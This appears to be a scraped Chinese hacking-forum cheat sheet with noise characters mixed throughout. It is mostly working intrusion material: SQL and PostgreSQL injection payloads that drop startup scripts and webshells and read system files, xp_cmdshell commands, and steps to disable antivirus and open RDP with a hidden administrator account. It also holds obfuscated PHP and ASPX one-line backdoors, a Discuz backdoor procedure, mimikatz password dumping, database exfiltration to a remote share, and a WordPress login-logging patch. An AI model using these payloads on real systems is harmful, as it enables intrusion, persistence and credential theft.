/ h# u. G( f' `) d5 o4 A4 uinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
# I- I$ [2 [3 z5 a9 Cinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
) u) d& K9 v" o& Z* t% k! X8 Rinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
n; }/ Z6 N W$ o- U- e; wselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";4 h2 o0 L7 Q: k( N! z/ C& y* O' _/ d6 Q
drop table a;, y8 ?' A1 d' R/ L
" ~* T9 Y& G* x+ e H
英文版本:7 ?) c. u8 z1 e1 S
C) a4 O9 [8 S6 n N
use test;
% e6 I* Z# z, s# o8 a' k, Fcreate table a (cmd text);
: s- R3 _: M# L \0 ^insert into a values ("set wshshell=createobject (""wscript.shell"") " );! \: I: i' P1 U8 i$ E5 ~8 ?
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );* i {) v8 ^% {* \# r! ?
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );+ q* |4 s9 a: n! \ N
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";& F! W, O. l; d2 B0 D
drop table a;
8 ?/ p! k g- z1 ^( C
. i3 p. O$ R9 [! K' y( G* Fcreate table a (cmd BLOB);8 w7 U# D. Q8 N3 Y2 C6 m& B$ V
insert into a values (CONVERT(木马的16进制代码,CHAR));: s4 K- H5 s% Z
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'( y# O. v- o( R1 H" T2 `
drop table a;6 J$ i( w4 x& U; v0 @, X
) C8 M2 |5 P. Z2 P% @( U5 v
记录一下怎么处理变态诺顿
5 e0 w+ d. w% ~; Y7 v4 g, X查看诺顿服务的路径7 _$ R/ V6 [0 D5 E' F" {! E
sc qc ccSetMgr
# J* J' Y2 ^* p5 \9 V. ^. O* h然后设置权限拒绝访问。做绝一点。。
3 V$ h- I" c# l0 s4 g6 ?cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
0 K4 E, u4 Y4 C, U+ _cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"7 d& g% t+ S" A6 ]2 q' z1 |
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators& C8 d; ^9 J3 U4 _
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone/ X& w. g$ f& B S4 t3 g2 a
/ ~. [* f2 z2 \7 C! n' T
然后再重启服务器
4 d6 m, @: {7 ?; p- U" i0 }iisreset /reboot
- ?& w5 A. s9 j6 X# g, b这样就搞定了。。不过完事后。记得恢复权限。。。。
3 W" k/ A2 @4 f0 r0 Ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
# I& Z4 {/ T2 Ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
, {+ I3 ^2 u" V K9 k! G$ k T8 M, Jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F6 u& S, h/ Z9 K3 b
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F( D5 g/ a: M& H( V8 ~
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin1 p# \, d$ Z7 P& m" J( u
& @( K$ N) _' S) XEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
4 _7 }% g% O$ I$ H( ~* R# Q5 q9 F/ `, l
postgresql注射的一些东西) _* |& ^8 D+ U: ?
如何获得webshell
3 ~2 i) `7 r2 ~ w; J+ f/ L- ihttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); # {( X3 ?6 N- a* A6 A& F$ P- b
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); " Q& T: T8 t" F! {
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;1 U/ d% H( k9 m; g/ D# s
如何读文件* ^2 W6 v* z$ s2 y' j3 }! d
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
5 g) N1 f7 j2 @. S# H" c5 Khttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
9 p/ H, }- N' T! j. Fhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
! z+ U7 _2 O+ }* a5 B, K4 p
& i3 p; z' e) w/ e4 c: m; ^z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。3 k" b7 h5 q+ c; C( t( s1 J$ O
当然,这些的postgresql的数据库版本必须大于8.X) C$ w3 X" v- u4 ^& T/ e& g' {
创建一个system的函数:
. i4 I/ F- I0 I! ^. v3 hCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
A& ~4 ]: ]; A5 k* k1 _- _2 d7 a/ B- t2 t$ K1 N) H1 f! W: @
创建一个输出表:; N) a0 s) E4 {* y7 d
CREATE TABLE stdout(id serial, system_out text)0 T: }9 N0 u- G$ H# e9 ^7 n
7 i; w2 k' |" A9 w) @
执行shell,输出到输出表内:
7 i j8 R' F! @% O7 ^SELECT system('uname -a > /tmp/test')! `! s% {5 e! w" O6 j
; V, M3 S* g" x4 o
copy 输出的内容到表里面;
5 {+ L- W. _/ e% N0 O5 ^ sCOPY stdout(system_out) FROM '/tmp/test', W3 g9 {8 r9 F8 L6 o, q
6 ~1 j* E2 k7 P1 I3 C, X9 j; [7 `8 h从输出表内读取执行后的回显,判断是否执行成功
r# ^! N* Y! v* q7 ~( ]% {) I" K/ V2 v
SELECT system_out FROM stdout
: h" L1 D- h/ k4 E0 y下面是测试例子
; `$ v4 W9 p# ^! O" ~+ U- K, N9 a# ?- p8 }5 a
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- ) d7 p+ r) m$ f6 N- T
! c; I. E/ [) |. G* E7 E7 B% Y/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'$ ?7 N5 n. X# F$ ^- E8 h& _
STRICT --4 n/ N1 e6 h5 P) h* F/ _
1 Q" {9 P. u- h6 C/store.php?id=1; SELECT system('uname -a > /tmp/test') --
) ?: t2 c) h) {8 G8 b2 W
4 _, Q4 Z& |2 k& m( J2 @6 G: z" W/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --* s9 h- Q$ D- p) Q& y
8 V1 [- w. Q1 f1 v5 m4 u
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
/ f* F4 X* [# k. c# Jnet stop sharedaccess stop the default firewall
& P8 Q' d* b$ M/ }* [netsh firewall show show/config default firewall, e( l: h- }1 X% e! g$ f
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
8 d# T( l2 m. F A7 Znetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
- F: f/ M6 }; M$ K5 P修改3389端口方法(修改后不易被扫出)$ c* d% _1 C( X J3 T9 b% ^+ O
修改服务器端的端口设置,注册表有2个地方需要修改
5 J0 q6 |) a6 Z9 B L7 b' l# G4 {! ?( V2 ~
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
?( n" T* `4 b* d6 y `PortNumber值,默认是3389,修改成所希望的端口,比如6000" l5 s6 `7 ^: L
1 k7 j6 L! f! b& K5 J; t/ b第二个地方:
- N1 y; o/ y$ p$ r1 o2 w[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
; K4 M7 H1 | nPortNumber值,默认是3389,修改成所希望的端口,比如60005 T# L! |6 R' i$ L2 Z( w( Q
- T9 Y( {* z, Y" U( M, p# C现在这样就可以了。重启系统就可以了$ u9 K D* I7 x' a: x
0 D& \! A, X9 _" F+ P- Q. h
查看3389远程登录的脚本
6 U7 s9 q) C( Y; z0 b- F保存为一个bat文件
+ S: Z2 r0 M" q% tdate /t >>D:\sec\TSlog\ts.log
3 K2 f7 l' G# Ltime /t >>D:\sec\TSlog\ts.log
0 L3 J/ D) I& a( I2 w8 Snetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
" f x5 X' u# X1 gstart Explorer
) j- c c1 T g C p2 w3 d8 o6 r R$ U; d, [! L, c$ B2 A
mstsc的参数:
/ A3 D/ G* C" y9 G" f- d% x" A& _( A! n! _* V& Z
远程桌面连接" P; r6 m: W# E
) Z" L- i/ K" _1 H4 TMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]5 ^6 J/ C2 Y v
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?0 b+ `8 b7 |. A6 I
) D. p# h( g# s3 F, t' O1 _
<Connection File> -- 指定连接的 .rdp 文件的名称。
: P$ L0 `1 i5 W, V ^
) z7 j! ~; [8 K, ]/v:<server[:port]> -- 指定要连接到的终端服务器。
3 ~ U. N& v) a" s7 F" o9 F' W% a+ u! l8 J# G2 b. }
/console -- 连接到服务器的控制台会话。2 Q, q- x! N: C H) M/ z2 v
5 h( [" J3 O8 g9 `5 |0 Z0 ~
/f -- 以全屏模式启动客户端。
+ m3 D5 f- a4 X+ z+ t" u- V3 N8 [# Z
/w:<width> -- 指定远程桌面屏幕的宽度。
1 W0 X" j' f9 N0 v0 @
, j7 d- v! R3 W8 ]5 k% @/ k5 {+ h+ M/h:<height> -- 指定远程桌面屏幕的高度。
& |$ j! a3 v4 d) y# n
- ?4 J# q6 u( m& }( |/edit -- 打开指定的 .rdp 文件来编辑。/ [! D. a6 C; a x
5 e# O5 Z$ ]2 y# B: M" z9 C6 w/migrate -- 将客户端连接管理器创建的旧版
j+ t8 i8 g+ I. R0 I" c( q& K连接文件迁移到新的 .rdp 连接文件。- s& U3 O, q$ S5 L9 G$ u
) A; m' d2 V: ?/ {6 t; u: o7 ^4 @/ {( k% ^
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
+ X! l7 P7 R, {+ F4 emstsc /console /v:124.42.126.xxx 突破终端访问限制数量/ K; J U" U. @# _
# }0 }5 C' ?) h9 n: W! T$ c/ N命令行下开启3389
; R" \5 Z) Q+ C4 X/ o; U4 Anet user asp.net aspnet /add
; s9 S' e! i+ j3 L5 A! jnet localgroup Administrators asp.net /add
# w6 ~! c0 h/ L7 K( ]" [5 |net localgroup "Remote Desktop Users" asp.net /add
" a+ @" f* s+ Z( Z7 N' L+ m' d& O$ H* nattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D% j4 n- e. q" L0 F4 K
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
0 Y# V9 p- R/ H. } @ b+ Jecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
( W+ u* [! p( O$ D( \' secho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
4 ~1 {" P/ O( v- Dsc config rasman start= auto9 N" e; x, n/ [, T+ {4 e; z
sc config remoteaccess start= auto
p" v" I4 i7 O: Fnet start rasman! B5 c: G% S6 u5 L- Z' B7 w5 Q
net start remoteaccess1 O6 r) S. ~; s# M0 D) O
Media
8 ^, }( M8 F$ g: w# a( n) z* U. a2 ~4 v& Z<form id="frmUpload" enctype="multipart/form-data"
0 @3 m) l \/ Y7 J+ \action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>' y, ]* Q" c/ q' l2 h, D
<input type="file" name="NewFile" size="50"><br>9 x% l1 ?* V- H
<input id="btnUpload" type="submit" value="Upload">
5 ]* H0 z" h8 \3 L" r</form>: ?3 G' A' {0 t
7 I; O* e4 w: S" V8 O. ?control userpasswords2 查看用户的密码
7 T- I1 }1 k8 O6 K* B2 |5 laccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
0 e5 i+ S" s) F% hSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
( y8 b7 A- D) H' n' ^& u+ k; h+ M. w! n+ n# O
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
5 t: f3 T, x- |测试1:+ q$ i- X+ ]/ r% L: C) Q
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1/ D) j% b- _' d, m3 V4 |. v
0 |# L. b" J% O: D- a* b& _8 \! A测试2:7 g! x# V6 x+ O% l9 B+ }) r
, g5 f, h6 B: Acreate table dirs(paths varchar(100),paths1 varchar(100), id int)
# |' D& i1 U, d" k3 m2 B) U# ]) `/ u& h* i8 B3 n
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--; K" E+ X9 T# V6 m- e
; l, j7 e3 c# h3 K5 Y& T$ h, ^+ aSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t13 l# x! `; t6 C" w9 I/ I( C
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令. X. [: p4 z* v( q" T R9 B6 W' S
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
" P5 k2 F- R' l) C. Q B( C# Snet stop mcafeeframework6 Q0 f2 E& `! w2 p9 P k# C9 k
net stop mcshield
0 x: m) f* D4 _; z5 V$ E1 c3 hnet stop mcafeeengineservice4 D( \: {% \2 @- w/ P- z/ D
net stop mctaskmanager
1 y( B) o! C; ~+ U0 }# P7 l0 c; Qhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
- b8 Z; w! y( L# \+ n
+ C' [+ D9 k D: t. J, } VNCDump.zip (4.76 KB, 下载次数: 1)
, j/ X7 k* v. f- n密码在线破解http://tools88.com/safe/vnc.php
% f6 b+ g& Q6 z6 |0 r6 pVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
" X# H; Q. r8 @0 t/ S! U
. P1 c: K0 }$ `% z. H; oexec master..xp_cmdshell 'net user'" o& R" A: K8 k9 z
mssql执行命令。. p5 ?8 d5 c; W z
获取mssql的密码hash查询/ b5 G/ B/ ?0 F# k# l/ }4 n( c) M
select name,password from master.dbo.sysxlogins
* B* l% Q3 X: _/ O- |
/ ^. P& t1 F0 ^* g- z( M$ f/ \backup log dbName with NO_LOG;; r v( V: f+ g6 v: A& C; Z3 G; U
backup log dbName with TRUNCATE_ONLY;: H9 w; u; m+ L8 Z/ m- d6 U2 q
DBCC SHRINKDATABASE(dbName);
8 L. r1 {6 p% @9 I3 Y- i6 Kmssql数据库压缩
- U, g/ ~. M% U, x3 N' d% w4 L) Z4 o2 `) i
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK. R6 P0 w% M4 s" h) s% n! e
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
, |$ c9 X. o. i% q. H+ \
* R7 v1 Z% Y+ g1 b+ Ebackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
/ B ^% b% R" G' S _备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak. {- V% w6 T5 Z* y) k- y! [
4 d6 ` w- b, l. |
Discuz!nt35渗透要点:, I5 Y' s( @ H4 h
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default* s: ?$ V! @% d0 X: O% v0 U- \
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> O6 ^( Y* \8 `9 E0 C' R" m! k" R
(3)保存。 V6 s W h( W5 i5 E7 ~
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
; l! G5 ] f) h- x0 Vd:\rar.exe a -r d:\1.rar d:\website\3 H! Z2 E# B( S" D! R6 ~ ?4 z
递归压缩website
* b- G* @6 ^6 R T) q. [4 F- ~注意rar.exe的路径# f3 [: |6 r/ N# l( g
C' Z- I) O2 x
<?php
& C8 j$ h; l2 G' v2 g% s, `: D; j# A4 |. V4 H1 o) W" E6 Q
$telok = "0${@eval($_POST[xxoo])}";. A2 K Z# j5 Z9 y: ~- S' F s
1 E `0 s S7 M$ E- j
$username = "123456";8 p, r: N" ]2 ~, ~' s7 K% S6 V6 q
. B. B( \: D4 b! Q4 p5 T$userpwd = "123456";
3 n( _: t; {2 H+ z3 f" G8 Q2 |# }: m: i2 |& r& r0 d5 l% t
$telhao = "123456";) ]. o1 }6 _! L) ~4 x, V# h
; i* i, l4 G2 S: d0 r$telinfo = "123456";
3 q, T8 `' t9 f, M7 i/ O" X" c8 Y
- V) f( o1 V- w/ B?>1 C E5 F0 B& y. H
php一句话未过滤插入一句话木马
0 c# K. s! a! N2 r" @: u# M( o4 g& t4 J1 A8 H( K7 t& k! N8 _0 A
站库分离脱裤技巧
) {9 W/ `, S8 q8 \exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
# q7 q& M4 ~0 ~ Kexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
* B, w7 N: j* H$ b条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
3 M, I6 R" T& z7 O这儿利用的是马儿的专家模式(自己写代码)。
7 s- M3 {( r( E( Vini_set('display_errors', 1);* k" E: i* a4 {% @; N# J2 ~
set_time_limit(0);9 e4 V4 `5 B9 _% u* B
error_reporting(E_ALL);
$ ]4 O: F# D' t- r$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());! f. @, G! N' v2 T1 i
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
6 F0 c4 V- B: {/ ?$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
# P2 Y) X4 k( K- [. {# }+ s$ L$i = 0;
0 U, Q6 Y6 @- Z8 g1 T$ @$ r$tmp = '';3 ]" Q5 N: f0 W9 c# s5 `
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {/ b6 P0 H$ ~) p! U7 X: \
$i = $i+1;1 x3 ~$ u i& h! V& Y9 D
$tmp .= implode("::", $row)."\n";
x( Y. _- v. Y2 e if(!($i%500)){//500条写入一个文件
' {/ L: {- e; O2 r0 J $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';: S" M# f$ P, N9 q, z4 ?3 Z$ }8 y
file_put_contents($filename,$tmp);1 \' ?( F3 S! D
$tmp = '';
0 Q# g8 h8 r0 `1 @ }
/ t/ Y) L y& V! b6 w' q7 {}
& o3 K8 P* p* }1 P" ^mysql_free_result($result);
( ?+ V7 n% J$ \# @% l1 _+ Z; r/ I% z& D
, X: T! U( H& ^$ B h& U- M/ W
# c* Z. s$ E6 L# z+ U$ A& K//down完后delete
5 N2 b; u L/ [1 [' E6 w6 x
8 q( K1 I0 }. y1 h
; a1 {9 Z' D+ _- Iini_set('display_errors', 1);
r0 }) A2 R( g! {. herror_reporting(E_ALL);
, i, M- s- L, b+ R( f1 q$i = 0;
# M8 g$ H3 v" a0 |- ]& A5 i& xwhile($i<32) {# b! L; R8 C L" J
$i = $i+1;
* P6 {+ p4 X2 X4 d $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';% t5 C5 o, E, z4 s
unlink($filename);+ F F# N- x8 ]8 }4 m3 r
} : b1 {) g, G% k
httprint 收集操作系统指纹& k: w: q) @0 W8 Z7 z/ y
扫描192.168.1.100的所有端口
9 Z# w: K1 A9 X8 b9 s1 ^nmap –PN –sT –sV –p0-65535 192.168.1.1009 i/ R# i' e/ C3 C5 r, Q
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
% ]1 o2 ^5 R8 V7 Dhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输7 T0 e/ g. S7 l+ d, `
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host9 E+ ~0 q$ G8 i% N9 j. v
2 x# l2 e! R7 |5 @8 [8 [* G Y! Z
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
6 _6 n" [3 G, h" v! \# I7 f |0 q; E _) B3 o; Y( `' f3 [, }
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)5 L7 G0 B5 g9 }/ F4 k
1 s( }! K5 n% J: L1 A; } Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x1 f9 Y# B* u) Y7 M1 c0 s. W9 ^
3 b. D- k7 Y# h% |4 |$ k
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
9 n7 H7 a+ m1 w. t. g. M! a. Z6 U" H6 {
http://net-square.com/msnpawn/index.shtml (要求安装)5 D8 @/ J( E- K. b _% z
' S/ I6 G9 `6 B tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)% r3 w2 Y7 P& B/ R4 {& x
; I3 C. |6 b. n1 K, j SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
% A7 B; J. ~$ A4 eset names gb2312- I) o, b+ b! }9 o1 w
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
# u- c& o# N; i% V" v% b9 K) D% @. M: k, k
mysql 密码修改
K- [! P5 U6 Z$ DUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” - r Q6 e2 K- f' P- n' w% N( ~
update user set password=PASSWORD('antian365.com') where user='root';
8 x/ h: ^, b9 _* uflush privileges;
! ]% f/ F0 H, C Y& U高级的PHP一句话木马后门
- k8 P1 U8 { I
; r: |& X+ m/ f7 o9 {8 T入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀, G9 I$ ?3 u* a
. N+ \# d I( Q1、
* Y, f3 B E# ?- ^& U% {# T. r
8 @0 M) w/ G4 z$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
9 U3 I6 K' D, v- q/ f3 B [$ D. ~* ~! n+ l2 ~1 e
$hh("/[discuz]/e",$_POST['h'],"Access");+ f5 \- X6 d' \# s" X* w. f4 }
, U6 J+ k0 ~. J( m5 k/ H
//菜刀一句话
5 |, i2 y3 Q" p, H9 r
6 B& _3 `( A# U' d/ Y; `. \2、9 b& w3 d2 A- w, t/ T; ^
! r. {5 @. ]1 r6 _- R$filename=$_GET['xbid'];" p; C. B% { _
6 H; t: R) q/ `" S8 Z+ v; H; M
include ($filename);
& l% z g G* f U5 @8 C5 K
. j* O) M- t- b9 x" Z4 f$ }! d: f# n//危险的include函数,直接编译任何文件为php格式运行% K7 o l0 b9 Q& K0 y
+ _+ j9 G( g) [' d! {* Z' N
3、
5 E8 |/ Q' J/ C7 @6 |' l6 R* P7 b( r$ a1 \) l
$reg="c"."o"."p"."y";
- c- |# q/ f; g; s2 Z, S0 P8 V7 {& t& L& N( w
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
( W0 T( e7 a" G) H) ]% d% Q2 ]: Z6 n
//重命名任何文件4 R1 h4 w, r9 e9 K3 S
. |& X) Y! m5 K# {; g& g/ D _
4、 s: R" |* j1 o
9 h+ _6 V* P- @7 E; |0 u$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";0 G5 Q& p+ ? h' l. s9 q, s
; O* L, S7 J. B9 l$ b# {
$gzid("/[discuz]/e",$_POST['h'],"Access");* X9 c$ S+ e& e" M
) z% T* P2 ^+ h, i+ t
//菜刀一句话
! N2 M9 ]9 p1 @7 i
$ x l3 H# W( {5、include ($uid);3 g% K0 _ Q" ^6 n! ~/ w5 E4 Y
1 g1 [7 [: y" @4 D+ }2 y8 n8 W//危险的include函数,直接编译任何文件为php格式运行,POST
& K( ^1 c; v; p z/ j! l
6 p/ @, v" [; k7 u1 y- p1 c" k. N+ T) A* @7 z+ s3 B! ?6 l' d
//gif插一句话
1 C6 E9 l$ b( I1 @ m$ G' R0 f* w- S+ Q: z: @# G
6、典型一句话
0 J, G5 y0 l2 f7 l1 m
) _7 o. Q& z/ ~/ Q6 E程序后门代码
m+ V Q: J; w/ s8 r p9 W<?php eval_r($_POST[sb])?>0 V3 N' `4 x' ?. r
程序代码
' w+ T. H( w: a1 c9 T# @<?php @eval_r($_POST[sb])?>
3 O6 M) k* v5 C- i//容错代码6 U$ u* [' e( E
程序代码8 d7 X7 L+ w% d0 w3 R# C; [2 S/ d
<?php assert($_POST[sb]);?>3 y1 G) [6 y. x) v; p
//使用lanker一句话客户端的专家模式执行相关的php语句
H7 P6 q2 q! F$ P* t: G程序代码
/ |3 D5 [# `8 K<?$_POST['sa']($_POST['sb']);?>
: ]4 V4 s, A5 S9 q; O L: y! z( l" e% P程序代码7 E$ X9 {! R, Y" l) q& o
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
* c) h3 @6 ]4 o; M1 Y程序代码
/ z) N# ~6 J; Z& }' y<?php' Z+ G5 f$ j8 K/ X' Z
@preg_replace("/[email]/e",$_POST['h'],"error");2 w8 ]3 h8 ]& ~5 l! d% V. D
?>* u. M' H" d% ?+ D, K6 w
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入& Y5 j# G! y9 f, |5 n
程序代码
! ^- }( D% ?1 t: P- N' i' |<O>h=@eval_r($_POST[c]);</O>
( d) s: ]) {# ^- X1 m! e程序代码
! {6 g% I$ o- w2 a6 o+ O<script language="php">@eval_r($_POST[sb])</script>
6 I. I! F: g* n//绕过<?限制的一句话4 G; A7 U" J/ H u
- z+ f1 j4 R) J0 `2 ^ I1 B+ l
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip1 O5 y* W1 B/ U7 d( ]
详细用法:
( x7 ]: j9 `" `# ^1、到tools目录。psexec \\127.0.0.1 cmd
2 V$ m# S9 o. O2 y2 p% R2、执行mimikatz
0 G, _5 I+ x3 @/ g; U* Z8 O- l3、执行 privilege::debug
, ?8 ^! W6 `* P5 W6 \! W! `" r4、执行 inject::process lsass.exe sekurlsa.dll2 |* h' }6 v+ _) A4 n& o% K
5、执行@getLogonPasswords' L1 S$ Q5 l. s: j, ~
6、widget就是密码- b5 X$ z8 [. F$ P; u
7、exit退出,不要直接关闭否则系统会崩溃。! C/ \8 b2 m& g* X/ H8 t
) B/ s- N; c% q' z }
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面3 U7 ^' O9 y$ j0 S! L
. E$ c6 A0 [! p6 ?: V/ r, \5 o
自动查找系统高危补丁
! f* {* X0 c& C! l* Gsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
: r5 Q3 {8 w: f- Q1 i1 {4 o8 O+ V
u' Y% [6 e4 S/ \1 [突破安全狗的一句话aspx后门
0 ?3 `' j4 j' w* \8 U<%@ Page Language="C#" ValidateRequest="false" %>* O% t, j% w+ u( e( M3 I
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
4 a9 q8 r, p& F0 Qwebshell下记录WordPress登陆密码
+ W" v) v8 _1 n+ W0 v. pwebshell下记录Wordpress登陆密码方便进一步社工
9 K$ U* R5 Y4 z& J' V& h在文件wp-login.php中539行处添加:
/ J3 |* M9 ?7 L: X7 d& ]; j// log password
" d6 O5 F/ b! ?! q& j5 O/ d5 w$log_user=$_POST['log'];* X- g3 K$ H7 t" a4 Y
$log_pwd=$_POST['pwd'];. J. z. }5 @# X' }# x, T
$log_ip=$_SERVER["REMOTE_ADDR"];% |3 S9 k: u/ d# v- A! t( ?
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
; J7 s% g s+ c: F& A9 H3 k! M0 [$txt=$txt.”\r\n”;
0 U0 Z, c# l1 O* V4 \, x& I0 gif($log_user&&$log_pwd&&$log_ip){1 z& n0 I) m2 V; T% ^- P/ V
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);* {: }8 O" N- G) m( J4 V8 g
}. o' ~1 f0 z/ O) {
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
1 V" |% w0 F9 E$ T就是搜索case ‘login’4 [$ j7 `' T' C3 |- j; b$ C
在它下面直接插入即可,记录的密码生成在pwd.txt中,
! k3 A% r! ^) ?8 n其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录/ H, C- s& a2 O: x5 i( S+ v
利用II6文件解析漏洞绕过安全狗代码:
